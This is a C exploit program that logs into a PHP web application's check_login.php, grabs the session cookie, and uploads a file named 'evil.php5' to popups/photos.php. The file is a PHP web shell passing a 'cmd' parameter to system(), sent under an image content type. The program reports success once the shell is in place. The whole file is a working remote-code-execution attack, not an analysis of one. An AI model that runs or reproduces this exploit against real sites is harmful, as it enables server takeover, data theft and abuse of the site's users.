
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct option {char* member_0; int member_1; int member_3; int member_2; } ;


 int atoi (char*) ;
 int close (int) ;
 int free (char*) ;
 int getopt_long (int,char**,char*,struct option*,int*) ;
 char* optarg ;
 int printf (char*) ;
 scalar_t__ send (int,char*,int,int ) ;
 int socket_connect (char*,int) ;
 char* socket_receive (int,int) ;
 int strlen (char*) ;
 char* strstr (char*,char*) ;
 char* strtok (char*,char*) ;
 int usage (char*) ;
 int vspr (char**,char*,char*,char*,...) ;

int main(int argc, char *argv[]) {

 int sd,
     option,
     optidx,
     port = 80,
     clen,
     pkglen;
 char *buffer = ((void*)0),
   *rec = ((void*)0),
   *session = ((void*)0),
   *host = ((void*)0),
   *path = ((void*)0),
   *user = ((void*)0),
   *passwd = ((void*)0),
   code[] = "--AaB03x\r\n"
      "Content-Disposition: form-data; name=\"photo\"; filename=\"evil.php5\"\r\n"
      "Content-Type: image/jpeg\r\n"
         "\r\n"
      "<?php echo \"<pre>\"; system($_GET[cmd]); echo \"</pre>\"?>\r\n"
      "--AaB03x\r\n"

      "Content-Disposition: form-data; name=\"Call\"\r\n"
      "\r\n"
      "add\r\n"
      "--AaB03x\r\n"

      "Content-Disposition: form-data; name=\"photoType\"\r\n"
      "\r\n"
      "P\r\n"
      "--AaB03x\r\n"

      "Content-Disposition: form-data; name=\"image.x\"\r\n"
      "\r\n"
      "8\r\n"
      "--AaB03x\r\n"

      "Content-Disposition: form-data; name=\"image.y\"\r\n"
      "\r\n"
      "5\r\n"
      "--AaB03x--\r\n";

 struct option long_options[] = {
  {"host", 1, 0, 1 },
        {"port", 1, 0, 2 },
  {"path", 1, 0, 3 },
        {"username", 1, 0, 'u'},
        {"password", 1, 0, 'p'},
        {((void*)0), 0, 0, 0 },
 };

 if(argc < 2) {
  usage(argv[0]);
  return -1;
 }

 while((option = getopt_long(argc, argv, "u:p:", long_options, &optidx)) > 0) {

  switch(option) {

   case 1:
    host = optarg;
   break;

   case 2:
    port = atoi(optarg);
   break;

   case 3:
    path = optarg;
   break;

   case 'u':
    user = optarg;
   break;

   case 'p':
    passwd = optarg;
   break;

   default:
    usage(argv[0]);
    return -1;
   break;

  }

 }

 if(!host || !path || !user || !passwd || port < 0) {
  usage(argv[0]);
  return -1;
 }

 printf("\n[*] Connecting...\n");

 if((sd = socket_connect(host, port)) < 0) {
  printf("[-] Connection failed!\n\n");
  free(buffer);
  return -1;
 }

 printf("[+] Connected"
        "\n[*] Login...");

 clen = strlen(user)+strlen(passwd)+16;

 pkglen = vspr(&buffer, "POST %scheck_login.php HTTP/1.1\r\n"
                        "Host: %s\r\n"
                        "Content-Type: application/x-www-form-urlencoded\r\n"
                        "Content-Length: %d\r\n"
                        "\r\n"
                        "email=%s&password=%s", path, host, clen, user, passwd);

 if(send(sd, buffer, pkglen, 0) < 0) {
  printf("[-] Sending failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }

 if(!(rec = socket_receive(sd, 0))) {
  printf("[-] Receive failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }

 if(strstr(rec, "Password is invalid")) {
  printf("\n[-] Login Incorrect!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }

 session = strstr(rec, "PHPSESSID");

 if(!session) {
  printf("\n[-] Session error!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }

 session = strtok(session, ";");

 if(!session) {
  printf("\n[-] Session error!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }

 printf("\n[+] Login Successful"
   "\n[*] Uploading...\n");

 close(sd);
 if((sd = socket_connect(host, port)) < 0) {
  printf("[-] Connection failed!\n\n");
  free(buffer);
  return -1;
 }

 free(buffer);
 clen = strlen(code);

 pkglen = vspr(&buffer, "POST %spopups/photos.php HTTP/1.1\r\n"
            "Host: %s\r\n"
            "Cookie: %s\r\n"
            "Content-type: multipart/form-data, boundary=AaB03x\r\n"
            "Content-Length: %d\r\n"
            "\r\n"
            "%s", path, host, session, clen, code);

 if(send(sd, buffer, pkglen, 0) < 0) {
  printf("[-] Sending failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }

 if(!(rec = socket_receive(sd, 3))) {
  printf("[-] Receive failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }

 if(!strstr(rec, "evil.php5")) {
  printf("\n[-] Upload failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }

 free(buffer);
 close(sd);

 printf("[+] Shell uploaded"
   "\n[+] Connection closed\n\n");

 return 0;

}
